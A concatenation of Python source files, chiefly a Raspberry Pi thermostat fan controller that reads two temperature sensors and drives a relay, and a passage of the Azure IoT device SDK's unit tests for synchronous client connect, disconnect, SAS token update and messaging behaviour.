controls.controlsd_thread()
if __name__ == "__main__":
main()
|
pmac.py
|
from gpiozero import Button
from w1thermsensor import W1ThermSensor
from time import sleep
import RPi.GPIO as GPIO
import I2C_LCD_driver
import json
import threading
import os
import sys
config_file = os.path.join(sys.path[0], './config.json')
outsideTemp = 0
insideTemp = 0
fan_on = False
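# config.json is expected to look roughly like this (sensor IDs and setpoint are illustrative):
# {
#     "outside_sensor_id": "0316a279xxxx",
#     "inside_sensor_id": "0316a27axxxx",
#     "low_temp": 72.0
# }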
with open(config_file) as cf:
config = json.load(cf)
lcd = I2C_LCD_driver.lcd()
outsideSensor = W1ThermSensor(W1ThermSensor.THERM_SENSOR_DS18B20, config["outside_sensor_id"])
insideSensor = W1ThermSensor(W1ThermSensor.THERM_SENSOR_DS18B20, config["inside_sensor_id"])
GPIO.setmode(GPIO.BCM)
GPIO.setup(17, GPIO.OUT)
GPIO.output(17, GPIO.LOW)
def save_config():
with open(config_file, 'w') as cf:
json.dump(config, cf)
def turn_fan_on():
GPIO.output(17, GPIO.HIGH)
def turn_fan_off():
GPIO.output(17, GPIO.LOW)
def update_outsideTemp():
global outsideTemp
outsideTemp = outsideSensor.get_temperature(W1ThermSensor.DEGREES_F)
def update_insideTemp():
global insideTemp
insideTemp = insideSensor.get_temperature(W1ThermSensor.DEGREES_F)
def update_lcd():
global outsideTemp, insideTemp, config, fan_on
while True:
# write each reading on its own row (assumes a 20x4 character LCD)
lcd.lcd_display_string("Outside Temp: %6.1f" % outsideTemp, 1)
lcd.lcd_display_string("Desired Temp: %6.1f" % config["low_temp"], 2)
lcd.lcd_display_string("Inside Temp: %6.1f" % insideTemp, 3)
lcd.lcd_display_string("Fan on: %5s" % fan_on, 4)
sleep(.1)
lcd_thread = threading.Thread(target=update_lcd, args=())
lcd_thread.daemon = True
lcd_thread.start()
def lower_temp():
global config
if config["low_temp"] > 32.1:
config["low_temp"] -= 0.1
save_config()
def raise_temp():
global config
if config["low_temp"] < 100.1:
config["low_temp"] += 0.1
save_config()
def update_fan():
global outsideTemp, insideTemp, config, fan_on
if insideTemp - outsideTemp > 1 and insideTemp > float(config["low_temp"]):
fan_on = True
else:
fan_on = False
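# Worked example (illustrative numbers): insideTemp=78.0, outsideTemp=70.0, low_temp=72.0
# -> 78.0 - 70.0 = 8.0 > 1 and 78.0 > 72.0, so fan_on becomes True and the loop below
#    drives GPIO 17 high via turn_fan_on().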
buttonDown = Button(4)
buttonUp = Button(14)
buttonDown.when_released = lower_temp
buttonUp.when_released = raise_temp
while True:
update_insideTemp()
update_outsideTemp()
update_fan()
if fan_on:
turn_fan_on()
else:
turn_fan_off()
sleep(1)
|
test_sync_clients.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
import logging
import threading
import time
import os
import io
import six
import six.moves.urllib as urllib
from azure.iot.device.iothub import IoTHubDeviceClient, IoTHubModuleClient
from azure.iot.device import exceptions as client_exceptions
from azure.iot.device.common.auth import sastoken as st
from azure.iot.device.iothub.pipeline import constant as pipeline_constant
from azure.iot.device.iothub.pipeline import exceptions as pipeline_exceptions
from azure.iot.device.iothub.pipeline import IoTHubPipelineConfig
from azure.iot.device.iothub.models import Message, MethodRequest
from azure.iot.device.iothub.sync_inbox import SyncClientInbox
from azure.iot.device.iothub.abstract_clients import (
RECEIVE_TYPE_NONE_SET,
RECEIVE_TYPE_HANDLER,
RECEIVE_TYPE_API,
)
from azure.iot.device import constant as device_constant
from .shared_client_tests import (
SharedIoTHubClientInstantiationTests,
SharedIoTHubClientPROPERTYHandlerTests,
SharedIoTHubClientPROPERTYConnectedTests,
SharedIoTHubClientOCCURANCEConnectTests,
SharedIoTHubClientOCCURANCEDisconnectTests,
SharedIoTHubClientCreateFromConnectionStringTests,
SharedIoTHubDeviceClientCreateFromSymmetricKeyTests,
SharedIoTHubDeviceClientCreateFromSastokenTests,
SharedIoTHubDeviceClientCreateFromX509CertificateTests,
SharedIoTHubModuleClientCreateFromX509CertificateTests,
SharedIoTHubModuleClientCreateFromSastokenTests,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnvTests,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnvTests,
)
logging.basicConfig(level=logging.DEBUG)
##################
# INFRASTRUCTURE #
##################
# TODO: now that there are EventedCallbacks, tests should be updated to test their use
# (which is much simpler than this infrastructure)
class WaitsForEventCompletion(object):
def add_event_completion_checks(self, mocker, pipeline_function, args=[], kwargs={}):
event_init_mock = mocker.patch.object(threading, "Event")
event_mock = event_init_mock.return_value
def check_callback_completes_event():
# Assert exactly one Event was instantiated so we know the following asserts
# are related to the code under test ONLY
assert event_init_mock.call_count == 1
# Assert waiting for Event to complete
assert event_mock.wait.call_count == 1
assert event_mock.set.call_count == 0
# Manually trigger callback
cb = pipeline_function.call_args[1]["callback"]
cb(*args, **kwargs)
# Assert Event is now completed
assert event_mock.set.call_count == 1
event_mock.wait.side_effect = check_callback_completes_event
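# Usage pattern (as in the test_waits_for_pipeline_op_completion tests below): a shared test
# calls add_event_completion_checks() with the pipeline function under test, then invokes the
# corresponding client API on client_manual_cb; the patched Event.wait side effect fires the
# pipeline callback and asserts that the Event is set exactly once before the client call returns.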
##########################
# SHARED CLIENT FIXTURES #
##########################
@pytest.fixture
def handler():
def _handler_function(arg):
pass
return _handler_function
#######################
# SHARED CLIENT TESTS #
#######################
class SharedClientConnectTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'connect' pipeline operation")
def test_calls_pipeline_connect(self, client, mqtt_pipeline):
client.connect()
assert mqtt_pipeline.connect.call_count == 1
@pytest.mark.it("Waits for the completion of the 'connect' pipeline operation before returning")
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.connect
)
client_manual_cb.connect()
@pytest.mark.it(
"Raises a client error if the `connect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.TlsExchangeAuthError,
client_exceptions.ClientError,
id="TlsExchangeAuthError->ClientError",
),
pytest.param(
pipeline_exceptions.ProtocolProxyError,
client_exceptions.ClientError,
id="ProtocolProxyError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.connect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.connect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientDisconnectTests(WaitsForEventCompletion):
@pytest.mark.it(
"Runs a 'disconnect' pipeline operation, stops the handler manager, then runs a second 'disconnect' pipeline operation"
)
def test_calls_pipeline_disconnect(self, mocker, client, mqtt_pipeline):
manager_mock = mocker.MagicMock()
client._handler_manager = mocker.MagicMock()
manager_mock.attach_mock(mqtt_pipeline.disconnect, "disconnect")
manager_mock.attach_mock(client._handler_manager.stop, "stop")
client.disconnect()
assert mqtt_pipeline.disconnect.call_count == 2
assert client._handler_manager.stop.call_count == 1
assert manager_mock.mock_calls == [
mocker.call.disconnect(callback=mocker.ANY),
mocker.call.stop(),
mocker.call.disconnect(callback=mocker.ANY),
]
@pytest.mark.it(
"Waits for the completion of both 'disconnect' pipeline operations before returning"
)
def test_waits_for_pipeline_op_completion(self, mocker, client, mqtt_pipeline):
cb_mock1 = mocker.MagicMock()
cb_mock2 = mocker.MagicMock()
mocker.patch("azure.iot.device.iothub.sync_clients.EventedCallback").side_effect = [
cb_mock1,
cb_mock2,
]
# cb_mock_init = mocker.patch("azure.iot.device.iothub.sync_clients.EventedCallback")
client.disconnect()
# Disconnect called twice
assert mqtt_pipeline.disconnect.call_count == 2
# Assert callbacks sent to pipeline
assert mqtt_pipeline.disconnect.call_args_list[0][1]["callback"] is cb_mock1
assert mqtt_pipeline.disconnect.call_args_list[1][1]["callback"] is cb_mock2
# Assert callback completions were waited upon
assert cb_mock1.wait_for_completion.call_count == 1
assert cb_mock2.wait_for_completion.call_count == 1
@pytest.mark.it(
"Raises a client error if the `disconnect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.disconnect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.disconnect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientUpdateSasTokenTests(WaitsForEventCompletion):
# NOTE: Classes that inherit from this class must define some additional fixtures not included
# here, which will be specific to a device or module:
# - sas_config: returns an IoTHubPipelineConfiguration configured for Device/Module
# - uri: A uri that matches the uri in the SAS from sas_token_string fixture
# - nonmatching_uri: A uri that does NOT match to the uri in the SAS from sas_token_string
# - invalid_uri: A uri that is invalid (poorly formed, missing data, etc.)
@pytest.fixture
def device_id(self, sas_token_string):
# NOTE: This is kind of unconventional, but this is the easiest way to extract the
# device id from a sastoken string
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
device_id = token_uri_pieces[2]
return device_id
@pytest.fixture
def hostname(self, sas_token_string):
# NOTE: This is kind of unconventional, but this is the easiest way to extract the
# hostname from a sastoken string
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
hostname = token_uri_pieces[0]
return hostname
@pytest.fixture
def sas_client(self, client_class, mqtt_pipeline, http_pipeline, sas_config):
"""Client configured as if using user-provided, non-renewable SAS auth"""
mqtt_pipeline.pipeline_configuration = sas_config
http_pipeline.pipeline_configuration = sas_config
return client_class(mqtt_pipeline, http_pipeline)
@pytest.fixture
def sas_client_manual_cb(
self, client_class, mqtt_pipeline_manual_cb, http_pipeline_manual_cb, sas_config
):
mqtt_pipeline_manual_cb.pipeline_configuration = sas_config
http_pipeline_manual_cb.pipeline_configuration = sas_config
return client_class(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def new_sas_token_string(self, uri):
# New SASToken String that matches old device id and hostname
signature = "AvCQCS7uVk8Lxau7rBs/jek4iwENIwLwpEV7NIJySc0="
new_token_string = "SharedAccessSignature sr={uri}&sig={signature}&se={expiry}".format(
uri=urllib.parse.quote(uri, safe=""),
signature=urllib.parse.quote(signature, safe=""),
expiry=int(time.time()) + 3600,
)
return new_token_string
@pytest.mark.it(
"Creates a new NonRenewableSasToken and sets it on the PipelineConfig, if the new SAS Token string matches the existing SAS Token's information"
)
def test_updates_token_if_match_vals(self, sas_client, new_sas_token_string):
old_sas_token_string = str(sas_client._mqtt_pipeline.pipeline_configuration.sastoken)
# Update to new token
sas_client.update_sastoken(new_sas_token_string)
# Sastoken was updated
assert (
str(sas_client._mqtt_pipeline.pipeline_configuration.sastoken) == new_sas_token_string
)
assert (
str(sas_client._mqtt_pipeline.pipeline_configuration.sastoken) != old_sas_token_string
)
@pytest.mark.it("Begins a 'reauthorize connection' pipeline operation")
def test_calls_pipeline_reauthorize(self, sas_client, new_sas_token_string, mqtt_pipeline):
sas_client.update_sastoken(new_sas_token_string)
assert mqtt_pipeline.reauthorize_connection.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'reauthorize connection' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, sas_client_manual_cb, mqtt_pipeline_manual_cb, new_sas_token_string
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.reauthorize_connection
)
sas_client_manual_cb.update_sastoken(new_sas_token_string)
@pytest.mark.it(
"Raises a ClientError if the 'reauthorize connection' pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
sas_client_manual_cb,
mqtt_pipeline_manual_cb,
new_sas_token_string,
client_error,
pipeline_error,
):
# NOTE: If/When the MQTT pipeline is updated so that the reauthorize op waits for
# reconnection in order to return (currently it just waits for the disconnect),
# there will need to be additional connect-related errors in the parametrization.
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.reauthorize_connection,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
sas_client_manual_cb.update_sastoken(new_sas_token_string)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Raises a ClientError if the client was created with an X509 certificate instead of SAS"
)
def test_created_with_x509(self, mocker, sas_client, new_sas_token_string):
# Modify client to seem as if created with X509
x509_client = sas_client
x509_client._mqtt_pipeline.pipeline_configuration.sastoken = None
x509_client._mqtt_pipeline.pipeline_configuration.x509 = mocker.MagicMock()
with pytest.raises(client_exceptions.ClientError):
x509_client.update_sastoken(new_sas_token_string)
@pytest.mark.it(
"Raises a ClientError if the client was created with a renewable, non-user provided SAS (e.g. from connection string, symmetric key, etc.)"
)
def test_created_with_renewable_sas(self, mocker, uri, sas_client, new_sas_token_string):
# Modify client to seem as if created with renewable SAS
mock_signing_mechanism = mocker.MagicMock()
mock_signing_mechanism.sign.return_value = "ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI="
renewable_token = st.RenewableSasToken(uri, mock_signing_mechanism)
sas_client._mqtt_pipeline.pipeline_configuration.sastoken = renewable_token
# Client fails
with pytest.raises(client_exceptions.ClientError):
sas_client.update_sastoken(new_sas_token_string)
@pytest.mark.it("Raises a ValueError if there is an error creating a new NonRenewableSasToken")
def test_token_error(self, mocker, sas_client, new_sas_token_string):
# NOTE: specific inputs that could cause this are tested in the sastoken test module
sastoken_mock = mocker.patch.object(st.NonRenewableSasToken, "__init__")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
sas_client.update_sastoken(new_sas_token_string)
assert e_info.value.__cause__ is token_err
@pytest.mark.it("Raises ValueError if the provided SAS token string has already expired")
def test_expired_token(self, mocker, uri, sas_client, hostname, device_id):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote(uri, safe=""),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() - 3600), # expired
)
with pytest.raises(ValueError):
sas_client.update_sastoken(sastoken_str)
@pytest.mark.it(
"Raises ValueError if the provided SAS token string does not match the previous SAS details"
)
def test_nonmatching_uri_in_new_token(self, sas_client, nonmatching_uri):
signature = "AvCQCS7uVk8Lxau7rBs/jek4iwENIwLwpEV7NIJySc0="
sastoken_str = "SharedAccessSignature sr={uri}&sig={signature}&se={expiry}".format(
uri=urllib.parse.quote(nonmatching_uri, safe=""),
signature=urllib.parse.quote(signature),
expiry=int(time.time()) + 3600,
)
with pytest.raises(ValueError):
sas_client.update_sastoken(sastoken_str)
@pytest.mark.it("Raises ValueError if the provided SAS token string has an invalid URI")
def test_raises_value_error_invalid_uri(self, mocker, sas_client, invalid_uri):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote(invalid_uri, safe=""),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() + 3600),
)
with pytest.raises(ValueError):
sas_client.update_sastoken(sastoken_str)
class SharedClientSendD2CMessageTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_message' MQTTPipeline operation")
def test_calls_pipeline_send_message(self, client, mqtt_pipeline, message):
client.send_message(message)
assert mqtt_pipeline.send_message.call_count == 1
assert mqtt_pipeline.send_message.call_args[0][0] is message
@pytest.mark.it(
"Waits for the completion of the 'send_message' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_message
)
client_manual_cb.send_message(message)
@pytest.mark.it(
"Raises a client error if the `send_message` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_message,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message(message)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in a Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_wraps_data_in_message_and_calls_pipeline_send_message(
self, client, mqtt_pipeline, message_input
):
client.send_message(message_input)
assert mqtt_pipeline.send_message.call_count == 1
sent_message = mqtt_pipeline.send_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
@pytest.mark.it("Raises error when message data size is greater than 256 KB")
def test_raises_error_when_message_data_greater_than_256(self, client, mqtt_pipeline):
data_input = "serpensortia" * 25600
message = Message(data_input)
with pytest.raises(ValueError) as e_info:
client.send_message(message)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_message.call_count == 0
@pytest.mark.it("Raises error when message size is greater than 256 KB")
def test_raises_error_when_message_size_greater_than_256(self, client, mqtt_pipeline):
data_input = "serpensortia"
message = Message(data_input)
message.custom_properties["spell"] = data_input * 25600
with pytest.raises(ValueError) as e_info:
client.send_message(message)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_message.call_count == 0
@pytest.mark.it("Does not raises error when message data size is equal to 256 KB")
def test_raises_error_when_message_data_equal_to_256(self, client, mqtt_pipeline):
data_input = "a" * 262095
message = Message(data_input)
# This check exists because the Message class may change its default content type encoding,
# which would alter the size calculation above.
# A greater-than check is used for Python 2 compatibility; ideally this would be a not-equal check.
if message.get_size() > device_constant.TELEMETRY_MESSAGE_SIZE_LIMIT:
assert False
client.send_message(message)
assert mqtt_pipeline.send_message.call_count == 1
sent_message = mqtt_pipeline.send_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == data_input
class SharedClientReceiveMethodRequestTests(object):
@pytest.mark.it("Implicitly enables methods feature if not already enabled")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_enables_methods_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, method_name
):
mocker.patch.object(SyncClientInbox, "get")  # patch this so receive_method_request won't block
# Verify Method Requests feature enabled if not already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False
) # Method Requests will appear disabled
client.receive_method_request(method_name)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.METHODS
mqtt_pipeline.enable_feature.reset_mock()
# Verify Method Requests feature not re-enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
True
)  # Method Requests will appear enabled
client.receive_method_request(method_name)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it(
"Returns a MethodRequest from the generic method inbox, if available, when called without method name"
)
def test_called_without_method_name_returns_method_request_from_generic_method_inbox(
self, mocker, client
):
request = MethodRequest(request_id="1", name="some_method", payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request()
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(None)
assert inbox_mock.get.call_count == 1
assert received_request is request
@pytest.mark.it(
"Returns MethodRequest from the corresponding method inbox, if available, when called with a method name"
)
def test_called_with_method_name_returns_method_request_from_named_method_inbox(
self, mocker, client
):
method_name = "some_method"
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request(method_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(method_name)
assert inbox_mock.get.call_count == 1
assert received_request is request
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_method_request_can_be_called_in_mode(
self, mocker, client, block, timeout, method_name
):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_receive_method_request_default_mode(self, mocker, client, method_name):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a method request is available, in blocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_method_request_in_inbox_blocking_mode(self, client, method_name):
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox = client._inbox_manager.get_method_request_inbox(method_name)
assert inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
inbox._put(request)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_request = client.receive_method_request(method_name, block=True)
assert received_request is request
# This proves that the blocking happens because 'received_request' can't be
# 'request' until after a 10 millisecond delay on the insert. But because the
# 'received_request' IS 'request', it means that client.receive_method_request
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_times_out_waiting_for_message_blocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_message_in_inbox_nonblocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, method_name, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, method_name, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
client._receive_type = RECEIVE_TYPE_API
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(
self, mocker, client, mqtt_pipeline, method_name, block, timeout
):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
class SharedClientSendMethodResponseTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_method_response' pipeline operation")
def test_send_method_response_calls_pipeline(self, client, mqtt_pipeline, method_response):
client.send_method_response(method_response)
assert mqtt_pipeline.send_method_response.call_count == 1
assert mqtt_pipeline.send_method_response.call_args[0][0] is method_response
@pytest.mark.it(
"Waits for the completion of the 'send_method_response' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, method_response
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_method_response
)
client_manual_cb.send_method_response(method_response)
@pytest.mark.it(
"Raises a client error if the `send_method_response` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
method_response,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_method_response,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_method_response(method_response)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientGetTwinTests(WaitsForEventCompletion):
@pytest.fixture
